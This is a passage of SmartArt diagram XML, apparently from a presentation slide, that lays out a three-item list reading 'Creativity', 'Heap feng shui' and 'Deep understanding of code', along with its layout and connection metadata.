    <dgm:pt modelId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" type="pres">
      <dgm:prSet presAssocID="{6DB67578-E72B-4CB9-9E97-9506C0946234}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{355997B0-3E33-5A49-9FBF-07B0FD038352}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF893BCE-F4CC-ED49-95DC-A64A744D0E7E}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{646F0876-EBC3-034F-A124-99E877C84DA0}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03F097F3-E8F4-3345-B7D6-924AAC59545B}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADE0577C-D23F-CA4E-AAD9-0E21B4303C8B}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42EB9C0B-EEBF-6746-9405-EB24F1D30D8C}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2671590A-CEB6-1341-9936-D390CC60F93D}" type="presOf" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BF927F12-6F5B-2245-B8DF-C87A82191630}" type="presOf" srcId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" destId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" srcOrd="1" destOrd="0" parTransId="{4D2E8E50-AE0B-4791-B283-96A0276C0BFC}" sibTransId="{E751E930-5E16-4236-8EB9-C4DFD00F678B}"/>
    <dgm:cxn modelId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" srcOrd="2" destOrd="0" parTransId="{084D6896-64E6-41B3-AD89-016CA37D9A66}" sibTransId="{AAB31A73-FB96-423E-87B0-523B253FD503}"/>
    <dgm:cxn modelId="{5C72934C-50B6-C645-A2C7-D336A3F496EF}" type="presOf" srcId="{DF880266-12B2-45EE-9D54-C76817831F7C}" destId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0616C07E-6F52-44F4-B20A-B792708200A0}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{DF880266-12B2-45EE-9D54-C76817831F7C}" srcOrd="0" destOrd="0" parTransId="{7DA209EE-E26B-4FC6-BD9A-3987282CC8E5}" sibTransId="{98B4B280-2D56-4754-BD6D-5C1CF53AA000}"/>
    <dgm:cxn modelId="{2450C995-95F1-E049-A4C5-71D491F8E68E}" type="presOf" srcId="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" destId="{646F0876-EBC3-034F-A124-99E877C84DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" srcOrd="3" destOrd="0" parTransId="{C59DB59B-1C13-490E-9FCF-5C8D1A4997A0}" sibTransId="{7AAF9BC6-396A-4C9A-BD13-9052F8AF7A93}"/>
    <dgm:cxn modelId="{70FF4BF2-BC78-AD4C-B163-438AECAEBF3D}" type="presOf" srcId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" destId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DAD59A2C-C844-4D45-B8B0-5703A42CCF6A}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{355997B0-3E33-5A49-9FBF-07B0FD038352}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{854268C9-5184-FD41-A669-1256AC0FB109}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4B557666-179B-AB47-B4BE-C459FF62036F}" type="presParOf" srcId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" destId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F6B9D0C6-D51B-4044-A53D-04F5C7975C2F}" type="presParOf" srcId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" destId="{EF893BCE-F4CC-ED49-95DC-A64A744D0E7E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BEEC9836-83F2-AC42-88B1-16BDFE37C2A4}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0F690832-91D1-264C-8686-B34EE781A7EC}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E980A27E-0F4E-8347-A809-386BD41F13F2}" type="presParOf" srcId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" destId="{646F0876-EBC3-034F-A124-99E877C84DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B903454C-E648-5444-9829-538748CB2B30}" type="presParOf" srcId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" destId="{03F097F3-E8F4-3345-B7D6-924AAC59545B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0608C291-3FE4-C14F-A9A6-7E5CAE03C073}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3275CC46-E2DA-9E4C-84D6-9EE0AA9C76E1}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B503C812-D8B0-924C-89BB-4C7F47842209}" type="presParOf" srcId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" destId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{21BB043F-1AAC-D14E-8101-6177AFBF9721}" type="presParOf" srcId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" destId="{ADE0577C-D23F-CA4E-AAD9-0E21B4303C8B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{02574AB7-E5DB-174E-A960-921BD372DA52}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{318FBCFB-1CBA-894D-BFA0-12DDFACEFC17}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{64EA5BA8-EE42-0249-A4DC-E9605ADFBD5F}" type="presParOf" srcId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" destId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EB4A5531-4E11-AD46-ADFD-1EE818002CED}" type="presParOf" srcId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" destId="{42EB9C0B-EEBF-6746-9405-EB24F1D30D8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83B67D-2FD8-4CEE-BC3F-589E8CE291AD}"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5FF46CDB-6A8E-4717-B73E-33A9C85DED79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Creativity </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF6D3627-A811-4170-8EC3-055D26B0B2E6}" type="parTrans" cxnId="{97E3DF0A-9FAA-4385-9DB6-EC128CEE4861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}" type="sibTrans" cxnId="{97E3DF0A-9FAA-4385-9DB6-EC128CEE4861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Heap feng shui</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D72928-4AF7-41E9-904B-A656E8E8144E}" type="parTrans" cxnId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}" type="sibTrans" cxnId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Deep understanding of code</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{569C0025-2EE9-41FD-A2EC-EDC3D3C8A15E}" type="parTrans" cxnId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CEB11AD-F21A-465F-9B19-385F086E5812}" type="sibTrans" cxnId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" type="pres">
      <dgm:prSet presAssocID="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B30B67F3-E925-3444-B968-18BC84104B3D}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8ADD5E46-6C04-BA44-9CCC-F0998C09BA7A}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBE1BEC3-D8ED-D446-B7AB-9443EC03CA99}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD0BFD7A-55E1-3D48-9E47-39A4B8A7E055}" type="pres">
      <dgm:prSet presAssocID="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C49AEC99-7626-C646-8ED3-36425763C938}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE890018-1729-2442-9F66-F8449CCE2C51}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E5A4938-16A7-B34F-8C45-A122994C3A62}" type="pres">
      <dgm:prSet presAssocID="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0D5CBA5-5223-184C-AE80-609E43F5F6D8}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467BC}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{97E3DF0A-9FAA-4385-9DB6-EC128CEE4861}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" srcOrd="0" destOrd="0" parTransId="{AF6D3627-A811-4170-8EC3-055D26B0B2E6}" sibTransId="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}"/>
    <dgm:cxn modelId="{FCB3E60F-2E64-504D-B896-A62E0DC7BEF7}" type="presOf" srcId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" destId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C4E9E913-CB50-3846-880E-E6FE5EE207AE}" type="presOf" srcId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" destId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" srcOrd="1" destOrd="0" parTransId="{91D72928-4AF7-41E9-904B-A656E8E8144E}" sibTransId="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}"/>
    <dgm:cxn modelId="{9D246440-C315-B64E-BBBB-26F0C740CCDA}" type="presOf" srcId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" destId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{30926B7C-9521-724A-AA56-C07D80918A53}" type="presOf" srcId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" destId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{29BBC7B1-50AB-C74B-921B-95A6393514F6}" type="presOf" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" srcOrd="2" destOrd="0" parTransId="{569C0025-2EE9-41FD-A2EC-EDC3D3C8A15E}" sibTransId="{7CEB11AD-F21A-465F-9B19-385F086E5812}"/>
    <dgm:cxn modelId="{3D472ED2-E7B4-FB4C-9AD6-8DDDCA29476B}" type="presOf" srcId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" destId="{C49AEC99-7626-C646-8ED3-36425763C938}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{01A664F9-645B-2C4D-A9A6-183E64ECA0EA}" type="presOf" srcId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" destId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{13D7625D-F751-8B49-90D0-5E9C7923A5A8}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{B30B67F3-E925-3444-B968-18BC84104B3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C45498EF-7CC8-0844-AC92-D7C63B52C112}" type="presParOf" srcId="{B30B67F3-E925-3444-B968-18BC84104B3D}" destId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A1010621-0D0B-404B-A5E6-D80FEB2FD636}" type="presParOf" srcId="{B30B67F3-E925-3444-B968-18BC84104B3D}" destId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{99B86AFC-1F98-A745-80AF-03B5C8E00EF1}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{8ADD5E46-6C04-BA44-9CCC-F0998C09BA7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{95A922B8-3410-CE43-810D-F76D38B8E0F9}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{FBE1BEC3-D8ED-D446-B7AB-9443EC03CA99}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{81350606-2BD2-E748-8B4A-6B74C60F2A1E}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{BD0BFD7A-55E1-3D48-9E47-39A4B8A7E055}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C24357C3-B8CD-4D46-BD0E-62F24A660ABA}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{83F0FD68-1EC9-8945-8083-7CAF7274F560}" type="presParOf" srcId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" destId="{C49AEC99-7626-C646-8ED3-36425763C938}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
